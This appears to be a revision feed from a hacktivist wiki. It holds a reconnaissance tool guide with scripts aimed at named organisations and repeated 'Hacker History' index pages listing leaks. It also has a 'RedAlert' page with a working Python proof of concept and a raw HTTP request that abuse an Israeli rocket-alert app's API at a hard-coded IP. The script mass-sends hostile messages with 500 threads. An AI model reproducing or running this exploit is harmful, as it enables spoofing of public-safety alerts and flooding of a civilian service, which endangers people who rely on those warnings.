* https://github.com/EdOverflow/can-i-take-over-xyz
* https://github.com/Ice3man543/SubOver
* https://github.com/projectdiscovery/nuclei-templates/tree/main/http/takeovers
* https://www.hackerone.com/application-security/guide-subdomain-takeovers

==== Subdomain monitoring ====
Monitor your target for new subdomains whenever they pop up. Sometimes developers will create a new and temporary subdomain for testing and development, be notified whenever this happens. Include vulnerability scanners into the below bash script such as nuclei to automate some security testing as well.

* https://github.com/projectdiscovery/subfinder
* https://github.com/tomnomnom/anew
* https://github.com/projectdiscovery/notify

<pre>
#!/bin/bash
while true
do
subfinder -silent -dL domains.txt -all | anew subdomains.txt | notify
sleep 3600
done
</pre>

Be notified when your target updates their website.
<pre>
#!/bin/bash
while true
do
cat subdomains.txt -silent | httpx -sc -cl -location -title -silent | anew changes.txt | notify
sleep 15
done
</pre>

=== Content discovery ===
Find endpoints, URLs, Parameters, Resources and much more with content discovery.

* https://github.com/praetorian-inc/fingerprintx
* https://github.com/projectdiscovery/httpx
* https://github.com/tomnomnom/waybackurls
* Find AWS S3 buckets and test their permissions: https://github.com/gwen001/s3-buckets-finder
* Scan for open S3 buckets and dump the contents: https://github.com/sa7mon/S3Scanner
* Chrome extension that lists Amazon S3 Buckets while browsing: https://github.com/AlecBlance/S3BucketList

==== Fuzzing ====
* https://github.com/sullo/nikto
* https://github.com/epi052/feroxbuster
* https://github.com/OJ/gobuster
* https://github.com/ffuf/ffuf
* https://github.com/maurosoria/dirsearch

=== Word Lists ===
Word lists can be used in your content discovery when performing directory bruteforcing and subdomain bruteforcing.

* All the best word lists for different tools and content discovery goals: https://wordlists.assetnote.io
* Repository of many different kinds of word lists: https://github.com/danielmiessler/SecLists
* Quickly generate context-specific wordlists for content discovery from lists of URLs or paths : https://github.com/ameenmaali/wordlistgen
* Content discovery URLs and files word list: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10
* File and directory discovery word list: https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
* Subdomain enumeration word list: https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a
* Potentially dangerous files: https://github.com/Bo0oM/fuzz.txt
* Download and search specific domain names using (only includes popular cloud providers): https://kaeferjaeger.gay/?dir=sni-ip-ranges
** Search for and extract your targets domains: <code>cat ~/sni_ip_ranges/*.txt | grep "\target\.com" | awk -F'-- ' '{print $2}' | tr ' ' '\n' | tr '[' ' ' | sed 's/ //' | sed 's/\]//' | sort -u</code>
*** Extract only domains: <code>grep -E -o '[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})' ~/sni_ip_ranges/*.txt > domains.txt</code>

=== Port scanners ===
When performing a port scan pay special attention to non-standard ports.

* https://github.com/nmap/nmap
* https://github.com/projectdiscovery/naabu
* https://github.com/robertdavidgraham/masscan
* https://github.com/zmap/zmap
* https://github.com/RustScan/RustScan

=== Technology scanners ===
'''NOTE: using browser add-ons will change your browser fingerprint and reduce anonymity.'''

When performing a penetration test we will want to know what technology is running on the target and what version it's running as so that later we can start looking for possible working [https://www.kali.org/tools/exploitdb/#searchsploit public exploits].

* Browser add-on to detect web technologies: https://www.wappalyzer.com
* Browser add-on to detect web technologies: https://www.whatruns.com
* Browser add-on to detect web technologies: https://builtwith.com/toolbar
* WhatWeb identifies web technologies: https://github.com/urbanadventurer/whatweb
* Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning: https://github.com/rverton/webanalyze
* <code>subfinder -d nasa.gov -silent | httpx -silent | nuclei -t technologies -silent</code>
* A utility to detect various technology for a given IP address: https://github.com/projectdiscovery/cdncheck

=== Web Crawlers ===
Crawl a website, extract all URL endpoints and save them for further analysis. Useful for digging up parameters on websites to test for common vulnerabilities ([https://enlacehacktivista.org/index.php?title=Exploitation#Payloads XSS, SQLi, IDOR, LFI/RFI, etc])

* https://github.com/projectdiscovery/katana
* https://github.com/jaeles-project/gospider
* https://github.com/hakluke/hakrawler
* https://www.zaproxy.org
* https://github.com/edoardottt/cariddi

=== ASN scanners ===
Map out an organizations network ranges using ASN information.

* https://github.com/projectdiscovery/asnmap
* https://github.com/banviktor/asnlookup
* <code>[https://github.com/OWASP/Amass amass] intel -asn [https://bgp.he.net/search?search%5Bsearch%5D=nasa&commit=Search AS21556]</code>
* <code>echo 'nasa' | [https://github.com/j3ssie/Metabigor metabigor] net --org -v</code>
* <code>echo '[https://bgp.he.net/search?search%5Bsearch%5D=nasa&commit=Search AS21556]' | [https://github.com/j3ssie/Metabigor metabigor] net --asn -v</code>
* <code>amass intel -active -org nasa -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -active -asn @ -max-dns-queries 2500| sort -u</code>

=== Google hacking ===
Refine your google searches (also works on Bing and DuckDuckGo) to discover paths, files, vulnerabilities, endpoints, login portals and technology.
* (Book) Google Hacking for Penetration Testers 3rd Edition
* https://github.com/Proviesec/google-dorks
* https://www.exploit-db.com/google-hacking-database
* https://dorksearch.com
* https://taksec.github.io/google-dorks-bug-bounty

=== Intercepting proxies ===
* https://mitmproxy.org
* https://portswigger.net/burp
* https://www.zaproxy.org
* https://github.com/projectdiscovery/proxify

== Exploitation ==
For automatic exploit tools and payloads, see [[exploitation]].

RedAlert

2023-10-12T15:59:36Z

Booda:

Hacktivist group [https://t.me/AnonGhostOfficialTeam AnonGhost] hacked a [https://play.google.com/store/apps/details/Alerta+roja:+Israel?id=com.kobisnir.redalert Red Alert application] that Israelis use to be alerted for when Hamas performs rocket fire attacks via an [https://enlacehacktivista.org/index.php?title=Hacking_APIs API vulnerability], allowing them to send red alert messages on mass to anyone and everyone who uses the app, allowing them to say anything they like.

== Explanation of the Hack ==

'''POC 1:'''
<pre>
import requests
import threading
import time

url = "http://54.214.248.70:80/redalert/and/api/chat.php"
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)",
"Host": "54.214.248.70",
"Connection": "Keep-Alive",
"Accept-Encoding": "gzip",
}

data = {
"msg": "death to israel",
"method": "sendmsg",
"time": "🇵🇸",
"hash": "f1f416dd17fb4668098a8b02c845021f",
"token": "fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me",
"ts": "1696713616907",
"username": "࿕",
}

num_threads = 500
num_requests = 20000

def send_request():
for _ in range(num_requests // num_threads):
response = requests.post(url, headers=headers, data=data)
print(response.text)

threads = []
for _ in range(num_threads):
thread = threading.Thread(target=send_request)
threads.append(thread)
thread.start()

for thread in threads:
thread.join()
</pre>

'''POC 2:'''
<pre>
POST /redalert/and/api/chat.php?msg=AnonGhost&method=sendmsg&time=7%3A13&hash=52bd01a926202bc0e5e7ba68270e4705&token=FUCKISRAEL&ts=1696720382270&username=AnonGhost&& HTTP/1.1
Host: 54.214.248.70
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
</pre>
== Media Coverage ==
# https://x.com/GroupIB_TI/status/1711234869060358562
# https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts
# https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR

RedAlert

2023-10-12T15:46:21Z

Booda: /* Media Coverage */

'''NOTE:''' This page is under construction

== Explanation of the Hack ==

== Media Coverage ==
# https://x.com/GroupIB_TI/status/1711234869060358562
# https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts
# https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR

Rules of engagement - Red Cross

2023-10-11T02:21:37Z

Booda: Created page with "'''NOTE:''' This page is under construction == Media Coverage == # https://www.bbc.com/news/technology-66998064"

'''NOTE:''' This page is under construction

== Media Coverage ==
# https://www.bbc.com/news/technology-66998064

Hacker History

2023-10-11T02:20:08Z

Booda: /* 2023 */

== 2005 ==
* [[Protest Warrior]]

== 2008 ==
* [[Sarah Palin emails]]

== 2010 ==
* [[SRS Electronic Declaration System]]
* [[Operation Payback]]

== 2011 ==
* [[Chinga la Migra]]
* [[CorruptBrazil]]
* [[Fuck FBI Friday]]
* [[HBGary]]
* [[LeakyMails]]
* [[Shooting Sheriffs Saturday]]
* [[Sownage]]
* [[Stratfor]]
* [[RedHack]]
* [[LulzSec Sony]]

== 2012 ==
* [[Apple UDIDs]]
* [[CSLEA]]
* [[Norton AntiVirus]]
* [[Syria emails]]
* [[Bureau Of Justice]]
* [[CabinCr3w]]

== 2013 ==
* [[Project AIG]]

== 2014 ==
* [[LulzSecPeru]]
* [[Gamma Group]]
* [[Russian Interior Ministry]]

== 2015 ==
* [[wikipedia:Football Leaks]]
* [[Hacking Team]]

== 2016 ==
* [[Berat Albayrak Emails]]
* [[Panama Papers]]
* [[Surkov Leaks]]
* [[Catalan police union]]

== 2017 ==
* [[Bob Otto emails]]
* [[Cellebrite]]
* [[Flexispy]]
* [[Freedom Hosting II]]

== 2018 ==
* [[Salvini emails]]
* [[Doxxing-Adventskalender]]

== 2019 ==
* [[GorraLeaks]]
* [[Paco Leaks]]
* [[Milico Leaks]]
* [[Capital One]]
* [[GdP (Hambacher Forest)]]
* [[Perceptics]]
* [[Cayman National Bank and Trust (Isle of Man)]]
* [[Iron March]]
* [[Varela Leaks]]

== 2020 ==
* [[Luanda Leaks]]
* [[BlueLeaks]]
* [[Intel exconfidential Lake]]

== 2021 ==
* [[Gab]]
* [[Myanmar Investments]]
* [[American Patriots Three Percent‎]]
* [[Verkada]]
* [[Sons of Confederate Veterans]]
* [[MagaCoin]]
* [[Electronic Arts]]
* [[Tea Party Patriots]]
* [[Cyber Partisans]]
* [[HART]]
* [[Policía Nacional Civil de El Salvador]]
* [[Epik]]
* [[Oath Keepers]]
* [[America's Frontline Doctors]]
* [[Twitch]]
* [[Attila Hildmann‎]]
* [[Metropolitan Police Department D.C.]]
* [[Academy of Public Administration (Belarus)]]
* [[AnibalLeaks]]
* [[Texas GOP]]

== 2022 ==
* [[Myanmar Internal Revenue Department]]
* [[Patriot Front]]
* [[Belarusian Railway]]
* [[Pronico]]
* [[Roskomnadzor]]
* [[OpRussia]]
* [[Nauru Police Force]]
* [[Extractivist Leaks/es]]
* [[Uber]]
* [[Liberty Counsel]]
* [[Fiscalia|Fiscalia of Colombia]]
* [[Fuerzas Represivas]]
* [[InfraGard]]

== 2023 ==
* [[Odin Intelligence]]
* [[TSA No Fly List]]
* [[SiegedSec NATO]]
* [[LetMeSpy]]
* [[Greater Manchester Police (GMP)]]
* [[RedAlert]]
* [[WebDetetive]]
* [[SpyHide]]
* [[Rules of engagement - Red Cross]]

SpyHide

2023-10-11T02:15:26Z

Booda: Created page with "'''NOTE:''' This page is under construction == Media Coverage == # https://maia.crimew.gay/posts/fuckstalkerware-2 # https://ddosecrets.com/wiki/SpyHide"

'''NOTE:''' This page is under construction

== Media Coverage ==
# https://maia.crimew.gay/posts/fuckstalkerware-2
# https://ddosecrets.com/wiki/SpyHide

Hacker History

2023-10-11T02:14:40Z

Booda: /* 2023 */

== 2005 ==
* [[Protest Warrior]]

== 2008 ==
* [[Sarah Palin emails]]

== 2010 ==
* [[SRS Electronic Declaration System]]
* [[Operation Payback]]

== 2011 ==
* [[Chinga la Migra]]
* [[CorruptBrazil]]
* [[Fuck FBI Friday]]
* [[HBGary]]
* [[LeakyMails]]
* [[Shooting Sheriffs Saturday]]
* [[Sownage]]
* [[Stratfor]]
* [[RedHack]]
* [[LulzSec Sony]]

== 2012 ==
* [[Apple UDIDs]]
* [[CSLEA]]
* [[Norton AntiVirus]]
* [[Syria emails]]
* [[Bureau Of Justice]]
* [[CabinCr3w]]

== 2013 ==
* [[Project AIG]]

== 2014 ==
* [[LulzSecPeru]]
* [[Gamma Group]]
* [[Russian Interior Ministry]]

== 2015 ==
* [[wikipedia:Football Leaks]]
* [[Hacking Team]]

== 2016 ==
* [[Berat Albayrak Emails]]
* [[Panama Papers]]
* [[Surkov Leaks]]
* [[Catalan police union]]

== 2017 ==
* [[Bob Otto emails]]
* [[Cellebrite]]
* [[Flexispy]]
* [[Freedom Hosting II]]

== 2018 ==
* [[Salvini emails]]
* [[Doxxing-Adventskalender]]

== 2019 ==
* [[GorraLeaks]]
* [[Paco Leaks]]
* [[Milico Leaks]]
* [[Capital One]]
* [[GdP (Hambacher Forest)]]
* [[Perceptics]]
* [[Cayman National Bank and Trust (Isle of Man)]]
* [[Iron March]]
* [[Varela Leaks]]

== 2020 ==
* [[Luanda Leaks]]
* [[BlueLeaks]]
* [[Intel exconfidential Lake]]

== 2021 ==
* [[Gab]]
* [[Myanmar Investments]]
* [[American Patriots Three Percent‎]]
* [[Verkada]]
* [[Sons of Confederate Veterans]]
* [[MagaCoin]]
* [[Electronic Arts]]
* [[Tea Party Patriots]]
* [[Cyber Partisans]]
* [[HART]]
* [[Policía Nacional Civil de El Salvador]]
* [[Epik]]
* [[Oath Keepers]]
* [[America's Frontline Doctors]]
* [[Twitch]]
* [[Attila Hildmann‎]]
* [[Metropolitan Police Department D.C.]]
* [[Academy of Public Administration (Belarus)]]
* [[AnibalLeaks]]
* [[Texas GOP]]

== 2022 ==
* [[Myanmar Internal Revenue Department]]
* [[Patriot Front]]
* [[Belarusian Railway]]
* [[Pronico]]
* [[Roskomnadzor]]
* [[OpRussia]]
* [[Nauru Police Force]]
* [[Extractivist Leaks/es]]
* [[Uber]]
* [[Liberty Counsel]]
* [[Fiscalia|Fiscalia of Colombia]]
* [[Fuerzas Represivas]]
* [[InfraGard]]

== 2023 ==
* [[Odin Intelligence]]
* [[TSA No Fly List]]
* [[SiegedSec NATO]]
* [[LetMeSpy]]
* [[Greater Manchester Police (GMP)]]
* [[RedAlert]]
* [[WebDetetive]]
* [[SpyHide]]

WebDetetive

2023-10-11T02:14:09Z

Booda: Created page with "'''NOTE:''' This page is under construction == Media Coverage == # https://ddosecrets.com/wiki/WebDetetive"

'''NOTE:''' This page is under construction

== Media Coverage ==
# https://ddosecrets.com/wiki/WebDetetive

Hacker History

2023-10-11T02:13:50Z

Booda: /* 2023 */

== 2005 ==
* [[Protest Warrior]]

== 2008 ==
* [[Sarah Palin emails]]

== 2010 ==
* [[SRS Electronic Declaration System]]
* [[Operation Payback]]

== 2011 ==
* [[Chinga la Migra]]
* [[CorruptBrazil]]
* [[Fuck FBI Friday]]
* [[HBGary]]
* [[LeakyMails]]
* [[Shooting Sheriffs Saturday]]
* [[Sownage]]
* [[Stratfor]]
* [[RedHack]]
* [[LulzSec Sony]]

== 2012 ==
* [[Apple UDIDs]]
* [[CSLEA]]
* [[Norton AntiVirus]]
* [[Syria emails]]
* [[Bureau Of Justice]]
* [[CabinCr3w]]

== 2013 ==
* [[Project AIG]]

== 2014 ==
* [[LulzSecPeru]]
* [[Gamma Group]]
* [[Russian Interior Ministry]]

== 2015 ==
* [[wikipedia:Football Leaks]]
* [[Hacking Team]]

== 2016 ==
* [[Berat Albayrak Emails]]
* [[Panama Papers]]
* [[Surkov Leaks]]
* [[Catalan police union]]

== 2017 ==
* [[Bob Otto emails]]
* [[Cellebrite]]
* [[Flexispy]]
* [[Freedom Hosting II]]

== 2018 ==
* [[Salvini emails]]
* [[Doxxing-Adventskalender]]

== 2019 ==
* [[GorraLeaks]]
* [[Paco Leaks]]
* [[Milico Leaks]]
* [[Capital One]]
* [[GdP (Hambacher Forest)]]
* [[Perceptics]]
* [[Cayman National Bank and Trust (Isle of Man)]]
* [[Iron March]]
* [[Varela Leaks]]

== 2020 ==
* [[Luanda Leaks]]
* [[BlueLeaks]]
* [[Intel exconfidential Lake]]

== 2021 ==
* [[Gab]]
* [[Myanmar Investments]]
* [[American Patriots Three Percent‎]]
* [[Verkada]]
* [[Sons of Confederate Veterans]]
* [[MagaCoin]]
* [[Electronic Arts]]
* [[Tea Party Patriots]]
* [[Cyber Partisans]]
* [[HART]]
* [[Policía Nacional Civil de El Salvador]]
* [[Epik]]
* [[Oath Keepers]]
* [[America's Frontline Doctors]]
* [[Twitch]]
* [[Attila Hildmann‎]]
* [[Metropolitan Police Department D.C.]]
* [[Academy of Public Administration (Belarus)]]
* [[AnibalLeaks]]
* [[Texas GOP]]

== 2022 ==
* [[Myanmar Internal Revenue Department]]
* [[Patriot Front]]
* [[Belarusian Railway]]
* [[Pronico]]
* [[Roskomnadzor]]
* [[OpRussia]]
* [[Nauru Police Force]]
* [[Extractivist Leaks/es]]
* [[Uber]]
* [[Liberty Counsel]]
* [[Fiscalia|Fiscalia of Colombia]]
* [[Fuerzas Represivas]]
* [[InfraGard]]

== 2023 ==
* [[Odin Intelligence]]
* [[TSA No Fly List]]
* [[SiegedSec NATO]]
* [[LetMeSpy]]
* [[Greater Manchester Police (GMP)]]
* [[RedAlert]]
* [[WebDetetive]]

LetMeSpy

2023-10-11T02:11:50Z

Booda:

'''NOTE:''' This page is under construction

== Media Coverage ==
# https://ddosecrets.com/wiki/LetMeSpy | [http://ddosxlvzzow7scc7egy75gpke54hgbg2frahxzaw6qq5osnzm7wistid.onion/wiki/LetMeSpy Tor]
# https://techcrunch.com/2023/06/27/letmespy-hacked-spyware-thousands
# https://www.malwarebytes.com/blog/podcast/2023/07/spy-vs-spy-exploring-the-letmespy-hack-with-maia-arson-crimew
# https://maia.crimew.gay/posts/fuckstalkerware-1
# https://www.theregister.com/2023/06/27/letmespy_stalkerware_app_hacked

LetMeSpy

2023-10-11T02:11:21Z

Booda: /* References */

== References ==
# https://ddosecrets.com/wiki/LetMeSpy | [http://ddosxlvzzow7scc7egy75gpke54hgbg2frahxzaw6qq5osnzm7wistid.onion/wiki/LetMeSpy Tor]
# https://techcrunch.com/2023/06/27/letmespy-hacked-spyware-thousands
# https://www.malwarebytes.com/blog/podcast/2023/07/spy-vs-spy-exploring-the-letmespy-hack-with-maia-arson-crimew
# https://maia.crimew.gay/posts/fuckstalkerware-1
# https://www.theregister.com/2023/06/27/letmespy_stalkerware_app_hacked

Greater Manchester Police (GMP)

2023-10-11T02:10:47Z

Booda: /* Media Coverage */

'''NOTE:''' This page is under construction

== Explanation of the Hack ==

== Media Coverage ==
# https://www.bbc.com/news/uk-england-manchester-66810756
# https://www.bbc.co.uk/news/uk-england-manchester-66843618
# https://www.theguardian.com/uk-news/2023/sep/14/greater-manchester-police-officers-data-hacked-in-cyber-attack
# https://news.sky.com/story/amp/greater-manchester-police-officers-details-targeted-in-ransomware-attack-12960852